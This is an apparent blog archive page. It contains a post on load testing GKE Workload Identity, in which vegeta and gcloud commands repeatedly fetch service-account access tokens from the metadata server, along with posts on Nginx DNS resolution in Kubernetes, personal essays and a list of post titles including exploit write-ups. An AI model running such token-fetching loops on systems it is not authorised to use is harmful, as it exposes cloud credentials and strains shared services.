This isn’t a great test because there’s a lot of extra work performed by the Container in running gcloud to print a Google access token (there may be bottlenecks in this gcloud command itself which is Python code), curling the googleapis.com endpoint to get the token info (originally done to verify the token was valid). And there’s probably bottlenecks in using a shell to do this. All in all, this implementation doesn’t really let you specify a fixed RPS. You’re at the mercy of how fast your Container, shell, gcloud, and the network will let you execute this. I also wasn’t able to run more Pods on a single node because I was hitting the max 32 pods per node limit. There were already a bunch of other GKE-system level workloads like Calico that took up node capacity.

Level 2

Apply this one Pod

cat <
apiVersion: v1
kind: Pod
metadata:
  name: wi-test
  namespace: [K8S_NAMESPACE]
spec:
  containers:
  - image: google/cloud-sdk
    name: wi-test
    command: [ '/bin/bash', '-c', '--' ]
    args: [ 'while true; do sleep 30; done;' ]
    securityContext:
      allowPrivilegeEscalation: false
      privileged: false
      readOnlyRootFilesystem: false
    resources:
      limits:
        cpu: 2
        memory: 4G
      requests:
        cpu: 2
        memory: 4G
EOF

Then kubectl exec in and run this command.

for i in {1..N}; do gcloud auth print-access-token & done; wait;

Everything seemed to work fine when N was 100. When N was 200 I got a few errors like the below. They look like client-side errors and not server ones though.

ERROR: gcloud failed to load: No module named 'ruamel.yaml.error'
gcloud_main = _import_gcloud_main()
import googlecloudsdk.gcloud_main
from googlecloudsdk.api_lib.iamcredentials import util as iamcred_util
from googlecloudsdk.api_lib.util import exceptions
from googlecloudsdk.core.resource import resource_printer
from googlecloudsdk.core.resource import yaml_printer
from googlecloudsdk.core.yaml import dict_like
from googlecloudsdk.core import yaml_location_value
from ruamel import yaml
from ruamel.yaml.main import * # NOQA
from ruamel.yaml.error import UnsafeLoaderWarning, YAMLError # NOQA

This usually indicates corruption in your gcloud installation or problems with your Python interpreter.

Please verify that the following is the path to a working Python 2.7 or 3.5+ executable:
/usr/bin/python3

If it is not, please set the CLOUDSDK_PYTHON environment variable to point to a working Python 2.7 or 3.5+ executable.

If you are still experiencing problems, please reinstall the Cloud SDK using the instructions here:
https://cloud.google.com/sdk/

ERROR: gcloud failed to load: cannot import name 'opentype' from 'pyasn1.type' (/usr/bin/../lib/google-cloud-sdk/lib/third_party/pyasn1/type/__init__.py)
from google.auth.crypt import _cryptography_rsa
import cryptography.exceptions


File "/usr/bin/../lib/google-cloud-sdk/lib/gcloud.py", line 67, in main
File "/usr/bin/../lib/google-cloud-sdk/lib/gcloud.py", line 48, in _import_gcloud_main
File "/usr/lib/google-cloud-sdk/lib/googlecloudsdk/gcloud_main.py", line 33, in 
File "/usr/lib/google-cloud-sdk/lib/googlecloudsdk/api_lib

gcloud does not synchronize between processes with concurrent invokations. It sometimes writes files to disk. So this is also not a great load test because it still doesn’t let you achieve a specific RPS and has client-side bottlenecks.

Level 3

Use a proper HTTP load testing tool. A colleague told me about vegeta. It’s a seemingly good tool, but, more importantly, its commands are amazing. vegeta attack ....

I first start a golang Pod that just busy-waits.

$ cat <
> apiVersion: v1
> kind: Pod
> metadata:
>   name: wi-test
>   namespace: [NAMESPACE]
> spec:
>   containers:
>   - image: golang:latest
>     name: wi-test
>     command: [ '/bin/bash', '-c', '--' ]
>     args: [ 'while true; do sleep 30; done;' ]
>     resources:
>       limits:
>         cpu: 2
>         memory: 4G
>       requests:
>         cpu: 2
>         memory: 4G
> EOF

pod/wi-test created

Then I get a shell in it.

kubectl --context [CONTEXT] -n [NAMESPACE] exec -it wi-test bash

Defaulting container name to wi-test.
Use 'kubectl describe pod/wi-test -n [NAMESPACE]' to see all of the containers in this pod.

root@wi-test:/go# go get github.com/tsenart/vegeta
root@wi-test:/go# vegeta -version

Version:
Commit:
Runtime: go1.14.1 linux/amd64
Date:

Let’s throw some load on WI! my-gsa@my-project.iam.gserviceaccount.com is the GSA associated with the KSA your workload runs as.

root@wi-test:/go# echo "GET http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/my-gsa@my-project.iam.gserviceaccount.com/token" | vegeta attack -header 'Metadata-Flavor: Google' -rate 10 -duration=5s | vegeta report

Requests      [total, rate, throughput]         50, 10.20, 10.20
Duration      [total, attack, wait]             4.904s, 4.9s, 4.168ms
Latencies     [min, mean, 50, 90, 95, 99, max]  4.168ms, 6.137ms, 5.039ms, 9.591ms, 10.444ms, 31.452ms, 31.452ms
Bytes In      [total, mean]                     25300, 506.00
Bytes Out     [total, mean]                     0, 0.00
Success       [ratio]                           100.00%
Status Codes  [code:count]                      200:50
Error Set:

root@wi-test:/go# echo "GET http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/my-gsa@my-project.iam.gserviceaccount.com/token" | vegeta attack -header 'Metadata-Flavor: Google' -rate 1000 -duration=5s | vegeta report
Requests      [total, rate, throughput]         5000, 1000.20, 127.51
Duration      [total, attack, wait]             31.175s, 4.999s, 26.176s
Latencies     [min, mean, 50, 90, 95, 99, max]  101.972ms, 11.003s, 7.652s, 30s, 30s, 30s, 30.001s
Bytes In      [total, mean]                     2011350, 402.27
Bytes Out     [total, mean]                     0, 0.00
Success       [ratio]                           79.50%
Status Codes  [code:count]                      0:1025  200:3975
Error Set:
Get "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/my-gsa@my-project.iam.gserviceaccount.com/token": context deadline exceeded (Client.Timeout exceeded while awaiting headers)

root@wi-test:/go# echo "GET http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/my-gsa@my-project.iam.gserviceaccount.com/token" | vegeta attack -header 'Metadata-Flavor: Google' -rate 100 -duration=5s | vegeta report
Requests      [total, rate, throughput]         500, 100.20, 98.40
Duration      [total, attack, wait]             5.081s, 4.99s, 91.244ms
Latencies     [min, mean, 50, 90, 95, 99, max]  3.805ms, 106.449ms, 59.058ms, 306.334ms, 372.519ms, 506.703ms, 601.534ms
Bytes In      [total, mean]                     253000, 506.00
Bytes Out     [total, mean]                     0, 0.00
Success       [ratio]                           100.00%
Status Codes  [code:count]                      200:500
Error Set:

root@wi-test:/go# echo "GET http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/my-gsa@my-project.iam.gserviceaccount.com/token" | vegeta attack -header 'Metadata-Flavor: Google' -rate 500 -duration=5s | vegeta report
Requests      [total, rate, throughput]         2500, 500.20, 43.29
Duration      [total, attack, wait]             34.072s, 4.998s, 29.074s
Latencies     [min, mean, 50, 90, 95, 99, max]  10.56ms, 12.579s, 756.03ms, 30s, 30s, 30s, 30.001s
Bytes In      [total, mean]                     746350, 298.54
Bytes Out     [total, mean]                     0, 0.00
Success       [ratio]                           59.00%
Status Codes  [code:count]                      0:1025  200:1475
Error Set:
Get "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/my-gsa@my-project.iam.gserviceaccount.com/token": context deadline exceeded (Client.Timeout exceeded while awaiting headers)

root@wi-test:/go# echo "GET http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/my-gsa@my-project.iam.gserviceaccount.com/token" | vegeta attack -header 'Metadata-Flavor: Google' -rate 250 -duration=5s | vegeta report
Requests      [total, rate, throughput]         1250, 250.22, 28.52
Duration      [total, attack, wait]             34.996s, 4.996s, 30s
Latencies     [min, mean, 50, 90, 95, 99, max]  8.331ms, 6.347s, 376.419ms, 30s, 30s, 30s, 30.001s
Bytes In      [total, mean]                     504988, 403.99
Bytes Out     [total, mean]                     0, 0.00
Success       [ratio]                           79.84%
Status Codes  [code:count]                      0:252  200:998
Error Set:
Get "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/my-gsa@my-project.iam.gserviceaccount.com/token": context deadline exceeded (Client.Timeout exceeded while awaiting headers)

root@wi-test:/go# echo "GET http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/my-gsa@my-project.iam.gserviceaccount.com/token" | vegeta attack -header 'Metadata-Flavor: Google' -rate 200 -duration=5s | vegeta report
Requests      [total, rate, throughput]         1000, 200.20, 28.28
Duration      [total, attack, wait]             32.43s, 4.995s, 27.435s
Latencies     [min, mean, 50, 90, 95, 99, max]  9.985ms, 2.739s, 188.509ms, 797.058ms, 30s, 30s, 30s
Bytes In      [total, mean]                     464002, 464.00
Bytes Out     [total, mean]                     0, 0.00
Success       [ratio]                           91.70%
Status Codes  [code:count]                      0:83  200:917
Error Set:
Get "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/my-gsa@my-project.iam.gserviceaccount.com/token": context deadline exceeded (Client.Timeout exceeded while awaiting headers)

root@wi-test:/go# echo "GET http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/my-gsa@my-project.iam.gserviceaccount.com/token" | vegeta attack -header 'Metadata-Flavor: Google' -rate 150 -duration=5s | vegeta report
Requests      [total, rate, throughput]         750, 150.20, 146.53
Duration      [total, attack, wait]             5.118s, 4.993s, 125.078ms
Latencies     [min, mean, 50, 90, 95, 99, max]  3.747ms, 224.285ms, 171.325ms, 460.236ms, 549.18ms, 682.161ms, 892.25ms
Bytes In      [total, mean]                     379500, 506.00
Bytes Out     [total, mean]                     0, 0.00
Success       [ratio]                           100.00%
Status Codes  [code:count]                      200:750
Error Set:

root@wi-test:/go# echo "GET http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/my-gsa@my-project.iam.gserviceaccount.com/token" | vegeta attack -header 'Metadata-Flavor: Google' -rate 175 -duration=5s | vegeta report
Requests      [total, rate, throughput]         875, 175.20, 24.46
Duration      [total, attack, wait]             34.097s, 4.994s, 29.103s
Latencies     [min, mean, 50, 90, 95, 99, max]  3.704ms, 1.687s, 231.652ms, 708.672ms, 2.432s, 30s, 30s
Bytes In      [total, mean]                     422004, 482.29
Bytes Out     [total, mean]                     0, 0.00
Success       [ratio]                           95.31%
Status Codes  [code:count]                      0:41  200:834
Error Set:
Get "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/my-gsa@my-project.iam.gserviceaccount.com/token": context deadline exceeded (Client.Timeout exceeded while awaiting headers)

root@wi-test:/go# echo "GET http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/my-gsa@my-project.iam.gserviceaccount.com/token" | vegeta attack -header 'Metadata-Flavor: Google' -rate 165 -duration=5s | vegeta report
Requests      [total, rate, throughput]         825, 165.20, 23.61
Duration      [total, attack, wait]             34.6s, 4.994s, 29.606s
Latencies     [min, mean, 50, 90, 95, 99, max]  3.483ms, 558.613ms, 222.111ms, 531.49ms, 622.473ms, 11.851s, 30s
Bytes In      [total, mean]                     413402, 501.09
Bytes Out     [total, mean]                     0, 0.00
Success       [ratio]                           99.03%
Status Codes  [code:count]                      0:8  200:817
Error Set:
Get "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/my-gsa@my-project.iam.gserviceaccount.com/token": context deadline exceeded (Client.Timeout exceeded while awaiting headers)

After more bisection, I found that this specific instance of gke-metadata-server starts to fail around 150RPS. When it does fail, p99 latency skyrockets from less than 1 second to 30 seconds. This is usually a sign of a rate limiter or quota.

How have you tried load testing WI or other GKE features? What’re your favorite load testing tools for these cases, and what interesting behavior have you found?

Becoming a Better Public Speaker

2019-05-26T00:04:59+02:00

At the beginning of this year I set a goal of becoming a better public speaker and more visible in both tech and other broader causes I believe in. I’m happy to say that in the last two months I gave three talks! Two were prepared talks with slides at tech conferences. The other was an unprepared conversation on a podcast. These were all technical and related to my work at Spotify. Outside of Spotify, I spoke for one minute at a mock political town hall in front of about 30 people and at a public policy forum for ~15 minutes in front of roughly the same number of people. But more on that later. Here are my technical talks. These talks wouldn’t be possible without the help, feedback, and moral support from my Spotify colleagues.

1. Keynote at KubeCon + CloudNativeCon Europe 2019 in Barcelona on May 22, 2019

“How Spotify Accidentally Deleted All its Kube Clusters with No User Impact”

2. Kubernetes Podcast from Google on April 23, 2019

“Spotify, with David Xia”. Listen on Spotify here.

3. Joint talk with Google at Google Next SF on April 11, 2019

“GKE Usage Metering: Whose Line Item Is It Anyway?”

More About Nginx DNS Resolution Than You Ever Wanted to Know

2019-05-17T12:58:38-04:00

This is a post about Nginx’s DNS resolution behavior I didn’t know about but wish I did before I started using Kubernetes (K8s).

Nginx caches statically configured domains once

Symptoms

I moved a backend service foo from running on a virtual machine to K8s. Foo’s clients include an Nginx instance running outside K8s configured with this upstream block.

upstream foo {
  server foo.example.com.;
}

server {
  ...

  location ~* /_foo/(.*) {
    proxy_pass https://foo/$1;
    ...
  }
}

K8s Pods can be rescheduled anytime so their IPs aren’t stable. I’m supposed to use K8s Services to avoid caching these ephemeral Pod IPs. But in my case because of interoperability reasons I was registering Pod IPs directly as A records for foo.example.com.. I started noticing that after my Pod IPs changed either because of rescheduling or updating the Deployment, Nginx started throwing 502 Bad Gateway errors.

Root Problem

Nginx resolves statically configured domain names only once at startup or configuration reload time. So Nginx resolved foo.example.com. once at startup to several Pod IPs and cached them forever.

Solution

Using a variable for the domain name will make Nginx resolve and cache it using the TTL value of the DNS response. So replace the upstream block with a variable. I have no idea why it has to be a variable to make Nginx resolve the domain periodically.

set $foo_url foo.example.com.;

And replace the proxy_pass line with

  location ~* /_foo/(.*) {
    proxy_pass https://$foo_url/$1;
    ...
  }

This behavior isn’t documented but has been observed empirically and discussed here, here, and here. I also learned that this setup requires me to define a resolver in the Nginx configs. For some reason Nginx resolves statically configured domains by querying the nameserver specified in /etc/resolv.conf but periodically resolved domains require a completely different config setting. I would love to know why.

The VM on which Nginx was running ran a Bind DNS server locally, so I set resolver 127.0.0.1. I triggered the code path that made Nginx send requests to foo and saw periodic DNS queries occurring with sudo tcpdump -i lo -n dst port 53 | grep foo.

What if that Nginx is also running on K8s?

Problem

I had another Nginx instance that also made requests to foo. This Nginx was running on K8s too. It was created with this Deployment YAML.

apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx
spec:
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
      - name: nginx
        image: openresty/openresty:trusty
        ports:
          - name: https
            containerPort: 443
            protocol: TCP
        volumeMounts:
          - name: nginx-config
            mountPath: /etc/nginx/conf.d
      volumes:
        - name: nginx-config
          configMap:
            name: nginx-config

The nginx-config ConfigMap was

apiVersion: v1
kind: ConfigMap
metadata:
  name: nginx-config
data:
  nginx.conf: |
    upstream foo {
      server foo.example.com.:443;
    }

    server {
      ...

      # use regex capture to preserve url path and query params
      location ~* /_foo/(.*) {
        proxy_pass https://foo/$1;
        ...
      }
    }

I replaced upstream with the same pattern above, but in this case when I needed to define resolver I couldn’t use 127.0.0.1 because there’s no Bind running locally. I can’t hardcode the resolver because it might change.

Solution: run Nginx and foo on the same K8s cluster and use the cluster-local Service DNS record

If Nginx and foo run on the same K8s cluster, I can use the cluster-local DNS record created by a K8s Service matching the foo Pods. A Service like this

apiVersion: v1
kind: Service
metadata:
  name: foo
  namespace: bar
...

will create a DNS A record foo.bar.svc.cluster.local. pointing to the K8s Service’s IP. Since this Service’s IP is stable and it load balances requests to the underlying Pods, there’s no need for Nginx to periodically lookup the Pod IPs. I can keep the upstream block like so.

upstream foo {
  server foo.bar.svc.cluster.local.:443;
}

As its name implies, foo.bar.svc.cluster.local. is only resolvable within the cluster. So Nginx has to be running on the same cluster as foo.

Solution: dynamically set the Nginx `resolver` equal to the system’s when the Pod starts

Disclaimer: This “solution” is more of an ugly, brittle hack that should only be used as a last resort.

What if Nginx is on another K8s cluster? Then I can set resolver to the IP of one of the nameservers in /etc/resolv.conf. After a bunch of tinkering I came up with this way to dynamically set the Nginx resolver when the Pod starts. A placeholder for resolver is set in the Nginx ConfigMap, and a command at Pod startup copies over the templated config and replaces the placeholder with a nameserver IP from /etc/resolv.conf.

Change nginx-config ConfigMap to

apiVersion: v1
kind: ConfigMap
metadata:
  name: nginx-config
data:
  nginx.conf.template: |
    server {
      ...

      # This directive is dynamic because we set it to the
      # kube-dns Service IP which is different for each cluster.
      resolver $NAMESERVER;

      set $foo_url foo.example.com.;

      # use regex capture to preserve url path and query params
      location ~* /_foo/(.*) {
        proxy_pass https://$foo_url/$1;
        ...
      }
    }

Deployment YAML then becomes (note the added command, args, and new volume and volumeMount).

apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx
spec:
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
      - name: nginx
        image: openresty/openresty:trusty
        command: ['/bin/bash', '-c']
        args:
        - |
          export NAMESERVER=$(grep 'nameserver' /etc/resolv.conf | awk '{print $2}' | tr '\n' ' ')
          echo "Nameserver is: $NAMESERVER"
          echo 'Copying nginx config'
          envsubst '$NAMESERVER' < /etc/nginx/conf.d.template/nginx.conf.template > /etc/nginx/conf.d/nginx.conf
          echo 'Using nginx config:'
          cat /etc/nginx/conf.d/nginx.conf
          echo 'Starting nginx'
          nginx -g 'daemon off;'
        ports:
          - name: https
            containerPort: 443
            protocol: TCP
        volumeMounts:
          - name: nginx-config-template
            mountPath: /etc/nginx/conf.d.template
          - name: nginx-config
            mountPath: /etc/nginx/conf.d
      volumes:
        - name: nginx-config
          emptyDir: {}
        - name: nginx-config-template
          configMap:
            name: nginx-config

A volume of type emptyDir is needed because recent versions of K8s made configMap volumes read-only. EmptyDir types are writable.

Hopefully this helps some people out there who don’t want to spend as much time as I did Googling obscure Nginx behavior.

Using Upstream Kubernetes Java Models Is Much Better Than Raw YAML

2018-11-11T17:11:38-05:00

It’s been a while since I blogged about something tech related, but I had some free time today.

Recently, I’ve been trying to refactor an internal Spotify deployment tool my team built and maintains. This deployment tool takes Kubernetes (k8s) YAML manifests, changes them, and essentially runs kubectl apply. We add metadata to the k8s manifests like labels.

Right now this tool receives the input YAML as strings, converts them to Jackson ObjectNodes, and manipulates those ObjectNodes. The disadvantage of this is that there’s no k8s type-safety. We might accidentally add a field to a Deployment that isn’t valid or remove something from a Service that’s required.

My refactor uses upstream k8s model classes from kubernetes-client/java which are themselves generated from the official Swagger spec. Here’s a helpful Yaml utility class that deserializes YAML strings into concrete classes and can also serialize them back into YAML strings. So helpful.

Unfortunately, there’s some bugs in the YAML (de)serialization that prevent me from finishing this effort.

Nonetheless, it’ll be much nicer to change k8s resources in a type-safe way instead of parsing and rewriting raw YAML strings.

Internet Meme Role Models

2018-01-07T11:29:18-05:00

I’m compiling a list of Internet meme role models. Here’s what I have so far. These people — they must be real human beings — must have either gone out of their way to do the right thing in a smart manner, something courageous with bonus points for being funny, or just be ridiculous. And they must be memeified. Exceptions will be made for exceptional but not memeified people like Hilde Lysiak.

Who else deserves to be on this list?

Snack Man defused a violent fight on the subway between a couple before anyone got hurt. He did it by standing in between them and munching on Pringles and Gummy Bears.
Ben Innes asked the EgyptAir Flight 181 hijacker who comandeered the airplane with a fake explosive belt if he could take a selfie with him. “I thought, why not? If he blows us all up it won’t matter anyway.”
Hilde Lysiak is ten years old and the writer and publisher of Orange Street News. She doesn’t take shit from anyone.
Salt Bae is…well you just have to see for yourself.

Now Max Knows How to Make a Latte

2017-08-30T01:19:06-04:00

I work at a music company but am more interested in politics and history. Artists visit our office often.

So I, often being ignorant of their fame, have casually interacted with them or criticized their milk steaming techniques when they’re using the office’s $20K espresso machine.

Only later am I told by their posse, “Did you know that was Mark Ronson/Bebe Rhexa/Max Martin/etc?”

“It’s OK,” I say. “Now Max knows how to make a real latte.”

Making Dumplings With My Grandparents

2017-07-05T22:50:03-04:00

Whenever I go back home to my parents’ house near Boston, if my maternal grandparents are there, they make hundreds of dumplings for me. I try to help out. We make everything from scratch including the skins. I’m good at rolling the skins but have much to learn on all other parts of the process. I’m becoming better at packing and closing the dumplings now though.

I’ve come to cherish this little tradition more and more. I need to plan my next trip to Boston!

Four Fascinating and Weird People

2017-06-01T06:36:06-04:00

Here are the stories of four fascinating and weird people that will make you laugh, be inspired, or cringe. Chang and Eng Bunker were conjoined twins who married two sisters and were slave-owners on the side of the Southern Confederacy. Rose Wilder Lane is the daughter of the author who wrote the Little House childrens books, a founding member of the American Libertarian movement, and just all around boss ass bitch. John Harvey Kellogg was the inventor of corn flakes, doctor, zealous anti-masturbation campaigner, and eugenicist.

1. Chang and Eng Bunker

Chang and Eng were two conjoined twins born in Vietnam in the 1800s. The term “Siamese twins” is based on them.

The brothers were joined at the sternum by a small piece of cartilage, and though their livers were fused, they were independently complete.

After a Scotsman noticed them and paraded them around as a freak show attraction for ten years, the Bunker twins settled down in Wilkesboro, North Carolina. They married two local white women who were sisters. They became naturalized American citizens and even owned slaves.

The Bunkers and their wives slept in a bed built for four. After a while their wives started to not get along. So they alternated between two different houses. Chang had twelve children while Eng had ten. Today their descendents number more than 1,500 and hold reunions. Their liver is on display in at the Mütter Museum in Philadelphia, Pennsylvania.

2. Rose Wilder Lane

Rose Wilder Lane was the eldest child of Laura Ingalls Wilder, the ostensible author of the Little House book series. Lane was by all means a boss ass bitch who lived a full life.

Sick of crop failures and tough frontier life, Lane moved in 1908 to San Francisco, California. She married a salesman named Gillette Lane and became pregnant. Sadly, her son was stillborn, and a subsequent surgery left her unable to have kids.

She felt her intellectual interests did not mesh with the life she was living with her husband. Keenly aware of her lack of a formal education, during these years, Lane read voraciously and taught herself several languages. Her writing career began around 1908, with occasional freelance newspaper jobs that earned much-needed extra cash.
Early career, marriage and divorce en.wikipedia.org/wiki/…

Lane’s writing career took off. She wrote for publications like Harper’s and Saturday Evening Post.

In the late 1920s, Lane was reputed to be one of the highest-paid female writers in America, and along with Hoover, she counted among her friends well known figures such as Sinclair Lewis, Isabel Paterson, Dorothy Thompson, John Patric, and Lowell Thomas.
Freelance writing career en.wikipedia.org/wiki/…

When Lane’s mother approached her with a rough autobiographical manuscript of her own childhood, Lane sensed that an American public fatigued by the Great Depression would take to the story of the loving, persistent, and independent Ingalls family. Lane encouraged and helped her mother rewrite and sell the story as a children’s novel. The book became a big success, and an entire series replete with T.V. shows, merchandise, and museums followed. Their family was raking in the dough.

I read the entire series as a kid and stil wax nostalgic for it. I thought Lane’s mother, who’s the titled author, wrote every book on her own and only received encouragement from her Lane. It turns out, however, that the truth is more interesting.

…an ongoing mutual collaboration that involved Lane more extensively in the earlier books, and to a much lesser extent by the time the series ended, as Wilder’s confidence in her own writing ability increased. Lane insisted to the end that her role was little more than that of her mother’s adviser, despite documentation to the contrary…Literary historians believe that Lane’s editing skills brought the dramatic pacing, literary structure, and characterization critically needed to make the stories publishable in book form.
Literary collaboration en.wikipedia.org/wiki/…

Even more fascinating is Lane’s societal and political views. She was a libertarian, economically laissez faire, anti-racist, and anti-communist. She protested paying income taxes, opposed the New Deal, and thought Social Security was a Ponzi scheme that would destroy the United States.

Lane played a hands-on role during the 1940s and 1950s in launching the “libertarian movement” and began an extensive correspondence with figures such as DuPont executive Jasper Crane and writer Frank Meyer, as well as her friend and colleague, Ayn Rand. She wrote book reviews for the National Economic Council and later for the Volker Fund, out of which grew the Institute for Humane Studies. Later, she lectured at, and gave generous financial support to, the Freedom School headed by libertarian Robert LeFevre.
Later years and death en.wikipedia.org/wiki/…

I want to reread the Little House books now knowing she was a die-hard libertarian who along with her mother purposefully wove themes of individualism into the series.

Rose Wilder Lane died in her sleep at age 81, on October 30, 1968, just as she was about to depart on a three-year world tour. She was buried next to her parents at Mansfield Cemetery in Mansfield, Missouri.
Later years and death en.wikipedia.org/wiki/…

3. John Harvey Kellogg

I haven’t read the entire Wikipedia entry on John Harvey Kellogg yet since a colleague only recently drew my attention to this smart, prolific, and bizarre man. These parts stood out to me at first glance though.

he invented corn flakes with his brother, Will Keith Kellogg
he was a medical doctor “who ran a sanitarium using holistic methods, with a particular focus on nutrition, enemas, and exercise. Kellogg was an advocate of vegetarianism”
he also created various phototherapeutic and electrotherapeutic inventions
he advocated sexual abstinence and “advocated keeping the diet plain to prevent sexual arousal”
he was an “especially zealous campaigner against masturbation”

He also recommended, to prevent children from this “solitary vice”, bandaging or tying their hands, covering their genitals with patented cages and electrical shock.
Masturbation prevention en.wikipedia.org/wiki/…

he liked yogurt enemas
he was a eugenicist

Useful Site for TLS Server Test

2017-05-20T12:49:20-04:00

My home server’s hard disk’s partition map was somehow corrupted. So I’m serving this website from Digital Ocean for now instead of my apartment. While rewriting the nginx server configs, I found this useful site that tests your server’s TLS configuration. It’ll give you a grade and warn you of weak encryption, key exchange protocols, cipher suites, etc.

Mozilla’s TLS configuration generator is useful for providing secure defaults.

I’m proud to say this site has an A.

David Xia

Benchmarking Kafka and Google Cloud Pub/Sub Latencies

Pub/Sub Latencies

Kafka Latencies

Summary

Notes on Michael Lewis' the Premonition

further reading

Mushroom Foraging in Waltham

Russula cremoricolor (Creamy Russula)

Russula brevipes (Short-Stemmed Russula)

Russula albonigra

Amanita bisporigera (Destroying angel)

some type of Grisette

Boletus pseudosensibilis

Monotropa uniflora (Ghost pipe)

How to Install Grpcio Pip Package on Apple M1

What I Recently Learned About Docker Networking and Debugging Networking Issues in General

Problem Statement and Use Case

Error #1: inter-container networking failed between containers attached to user-defined Docker networks

Error #2: DNS queries for external records from bar failed

Error #3: unbound refused to reply to DNS queries from a private IP range used by the Docker network we’re using

General Debugging Strategies and Techniques I Used

Patches

How Kubernetes Routes IP Packets to Services' Cluster IPs

The Problem

Finding the Root Cause: Down the Rabbit Hole

Confirming the Root Cause

The Speculative Fix

My Hints and Solutions to the First Three Levels of Over the Wire Vortex

Vortex Level 0 -> Level 1

My Solution to Exploit Exercises Protostar Final2 Level

Overview of source code

General Exploit Strategy

Exploiting memmove()

Exploiting free()

Crafting Malicious Packets

Crafting the Shellcode

References

How to Analyze Mobile App Traffic and Reverse Engineer Its Non-Public API

Setup mobile device and app

Install Charles Proxy TLS certificate on device

Patch the Android app’s network security config

Sniff the traffic

References

How to Exploit Dlmalloc Unlink(): Protostar Level Heap3

Exploit Exercise Protostar Heap3

Background on dlmalloc

What the heap looks like in heap3.c

Crafting the exploit

Checking it works

References

How to Expose a Localhost-only Endpoint on GKE

tl;dr lessons learned

My specific GKE cluster configuration

3 Levels of Load Testing GKE Workload Identity

tl;dr lessons learned

My specific GKE cluster configuration

High level of what Workload Identity is and how it works

Level 1

Level 2

Level 3

Becoming a Better Public Speaker

1. Keynote at KubeCon + CloudNativeCon Europe 2019 in Barcelona on May 22, 2019

2. Kubernetes Podcast from Google on April 23, 2019

3. Joint talk with Google at Google Next SF on April 11, 2019

More About Nginx DNS Resolution Than You Ever Wanted to Know

Nginx caches statically configured domains once

Symptoms

Root Problem

Solution

What if that Nginx is also running on K8s?

Problem

Solution: run Nginx and foo on the same K8s cluster and use the cluster-local Service DNS record

Solution: dynamically set the Nginx resolver equal to the system’s when the Pod starts

Using Upstream Kubernetes Java Models Is Much Better Than Raw YAML

Internet Meme Role Models

Now Max Knows How to Make a Latte

Making Dumplings With My Grandparents

Four Fascinating and Weird People

1. Chang and Eng Bunker

Exploiting `memmove()`

Exploiting `free()`

Solution: dynamically set the Nginx `resolver` equal to the system’s when the Pod starts